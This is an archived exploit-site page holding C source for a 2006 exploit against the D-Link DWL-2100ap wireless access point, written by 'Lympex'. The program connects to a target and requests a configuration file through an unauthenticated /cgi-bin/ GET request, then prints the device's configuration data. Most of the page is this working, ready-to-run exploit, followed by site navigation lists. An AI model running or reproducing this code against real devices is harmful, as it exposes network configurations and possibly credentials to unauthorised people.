D-Link.Wireless.Access-Point.c

D-Link.Wireless.Access-Point.c: Posted Jun 11, 2006; Authored by Lympex; exploit for D-Link DWL-2100ap which discloses the configuration file to remote users.; tags | exploit, remote; SHA-256 | 9964f14447ea2955f5b7016a84c062307bcc7b43558f3ff7cb4b7aeea4f671f5; Download | Favorite | View

D-Link.Wireless.Access-Point.c

/*
Nombre:      Revelación remota de información en D-Link DWL-2100ap
Fichero:    D-Link.Wireless.Access-Point.c
Creado por:    Lympex

  Contacto:
    Mail:  lympex[at]gmail[dot]com
    Web:  Http://L-Bytes.Tk

Fecha: 08/06/2006
*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib,"ws2_32.lib")

SOCKET sock;

void Uso(char *exe)
{
  printf("\n[+] Uso: %s server.com <puerto> fichero.cfg",exe);
  printf("\n[+] Ejemplo: %s mi_server.com 80 Intruders.cfg\n",exe);

  return;
}

/*********************/
/* CONECTA A UN HOST */
/*********************/
BOOL Conecta(char *Host, short Puerto)
{
  WSADATA wsaData;
  struct sockaddr_in Winsock_In;
    struct hostent *Ip;
  int err;

  /*iniciamos el socket*/
  WSAStartup(MAKEWORD(2,2), &wsaData);
  /*asociamos*/
  sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
  
  /*miramos si está correcto, y así no rellenamos la estructura Winsock_In para nada*/
  if(sock==INVALID_SOCKET)return FALSE;

  /*rellenamos la estructura*/
  Winsock_In.sin_port=htons(Puerto);
  Winsock_In.sin_family=AF_INET;

  /*pasamos el host -> ip*/
  Ip=gethostbyname(Host);
  Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

  /*conectamos*/
  err=WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL);
  if(err==SOCKET_ERROR)
    return FALSE;
  else
    return TRUE;
}

int main(int argc, char *argv[])
{
  BOOL conectado;
  char Buff[1024];
  int i;

  printf("\n*********************************************************");
  printf("\n* Revelacion remota de informacion en D-Link DWL-2100ap *");
  printf("\n*=======================================================*");
  printf("\n* Exploit coded by Lympex - lympex[at]gmail[dot]com     *");
  printf("\n*                           Http://L-Bytes.Tk           *");
  printf("\n*********************************************************\n");

  if(argc!=4)
  {
    Uso(argv[0]);
    return -1;
  }

  printf("\n[+] Conectando...");
  conectado=Conecta(argv[1],(short)atoi(argv[2]));

  if(conectado==FALSE)
  {
    printf("ERROR\n");
    return -1;
  }
  printf("OK");


  memset(Buff,0,sizeof(char*));
  sprintf(Buff,"GET /cgi-bin/%s HTTP/1.0 \n\n\0",argv[3]);

  i=0;
  while(Buff[i]!='\0')i++;

  send(sock,Buff,i,0);

  printf("\n\n------------------ [ DATOS ] ------------------\n\n");

  i=recv(sock,Buff,1024,0);
  Buff[i]='\0';
  printf("%s",Buff);

  printf("\n\n------------------ [ /DATOS ] -----------------\n");
  
  WSACleanup();
  return 0;
}

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

D-Link.Wireless.Access-Point.c

D-Link.Wireless.Access-Point.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

D-Link.Wireless.Access-Point.c

Share This

D-Link.Wireless.Access-Point.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems